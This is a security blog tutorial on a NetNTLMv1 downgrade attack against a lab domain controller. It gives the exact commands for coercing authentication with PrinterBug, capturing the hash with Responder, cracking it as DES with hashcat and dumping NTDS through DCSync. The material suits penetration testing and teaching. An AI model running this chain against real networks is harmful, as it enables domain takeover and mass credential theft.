NTLMv1 Downgrade attack

NetNTLMv1 downgrade 

As we have commented in previous posts, after forcing authentication and obtaining the NetNTLM hash of the password of the victim's machine user, we are presented with, mainly, three different exploitation scenarios, in this case we will be talking about: 

• NetNTLMv1 downgrade  

In this scenario, the attacker will leverage the use of the NetNTLMv1 authentication protocol on the network. 

In order to abuse this authentication protocol, the server vulnerable to “Coerce Authentication” must have the “LmCompatibilityLevel” key configured in the registry and have a value of 2 or less. 

This can be configured by enabling the sending of LM and NTLM responses in the group policy named “Network Security: LAN Manager Authentication Level”. 

Summary 

The exploitation process of this attack is briefly explained below: 

1. Obtain a NetNTLMv1 Response from the domain controller machine account by forcing authentication with any Coerce Authentication vulnerability. 
2. Transform the NetNTLMv1 hash obtained into a format that can be cracked in DES mode. 
3. Crack the different parts of the hash and obtain the DES keys for each of them. 
4. Transform the obtained DES keys to NTLM format. 
5. Perform a DCSync to obtain the NTDS through Pass The Hash using the NTLM hash obtained in the previous steps. 

Test Laboratory Components 

Below we briefly describe the assets found in the testing laboratory: 

• Attack_Machine – This machine refers to a Kali Linux from where we will carry out the attack to obtain a “Coerce Authentication” and have the software listening to obtain the machine user's hash in NetNTLMv1 format. 

• DC.corp.lab – Domain controller with the domain “corp.lab” configured, which will be a victim of the attack. A user named “Bob” will be configured in said unprivileged domain to emulate the attack from its compromise. Said server will have the group policy named above applied. 

Development of the attack 

Getting a NetNTLMv1 Response 

To begin the attack, we will need to check if the domain controller is vulnerable to any of the “Coerce Authentication” attacks explained “ here ”. In this case, the exploitation will be carried out by abusing the MS-RPC called MS-RPRN using the Printer Bug script. 

You must check that the DC has said MS-RPC enabled using the following command: 

                python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN' 

      

After verifying that the domain controller is vulnerable to said “Coerce Authentication”, the attacker's machine must be configured. To do this, you must edit the configuration file of the software known as Responder, as follows:

                sudo nano /etc/responder/Responder.conf 

				SMB = On 

				HTTP = On 

				;Challenge = Random 

			Challenge = 1122334455667788 

      

Once the respond configuration file has been edited, it must be executed as follows to make it listen. The –lm flag forces a downgrade in certain versions of the Operating System. 

                sudo responder -I eth0 -wv --lm  

      

Once “Responder” is running, the “Coerce Authentication” will be exploited.. 

                'python3 printerbug.py "CORP/bob:password" @dc.corp.lab attack_machine'

      

After forcing authentication of the domain controller's machine user against the attacker's machine, the NetNTLMv1 hash of that user is obtained. 

Transform the NetNTLMv1 hash obtained into a format that can be cracked 

As mentioned, once the NetNTLMv1 hash is obtained, it must be transformed into a format that can be cracked in DES mode. To do this, the ntlmv1-multi tool will be used, which will provide the following steps to follow to correctly crack the hash. 

                python3 ntlmv1.py --ntlmv1 'hash ntlmv1' 

      

As can be seen in the previous screenshot, the tool itself shows how to calculate the last 4 digits of the NTLM hash, and provides, on the one hand, the hashes that must be cracked to DES format, as well as the command that must be executed .  

Crack the different parts of the hash and obtain the DES keys of each of them 

Therefore, first, the calculation of the last 4 digits of the NTLM hash will be executed as follows using a hashcat tool:

                /usr/lib/hashcat-utils/ct3_to_ntlm.bin 'output obtained with ntlmv1.py' 

      

On the other hand, the two hashes provided by the ntlmv1-multi tool will be cracked to DES format using the hashcat cracking tool with the following command: 

          hashcat.exe -m 14000 -a 3 -1 charsets/DES_full.hcchr --hex-charset 'fichero con hashes' ?1?1?1?1?1?1?1?1       

      

NOTE: In old versions of hashcat, the “charset” DES_FULL.charset is used, in updated versions, DES_full.hcchr is used. 

After the cracking process, you obtain the following DES keys: 

Transform the obtained DES keys to NTLM format: 

Once the two DES keys have been obtained, other hashcat tools must be used which will allow these keys to be transformed into NTLM format. 

Terminal

                 /usr/lib/hashcat-utils/deskey_to_ntlm.pl 'DES KEY crackeada 1' 

		/usr/lib/hashcat-utils/deskey_to_ntlm.pl 'DES KEY crackeada 2' 

      

Perform a DCSync to obtain the NTDS using Pass The Hash:

After obtaining all parts of the domain controller's machine user's NTLM hash, it is possible to perform a DCSync and obtain the domain's NTDS using impacket 's secretsdump.py tool, performing a Pass The Hash attack: 

Terminal

                Python3 secretsdump.py -just-dc-ntlm -hashes ‘hash_ntlm’ ‘corp.lab/dc$@dc.corp.lab’’  

      

Dimas Pastor , Senior Analyst at Zerolynx Group .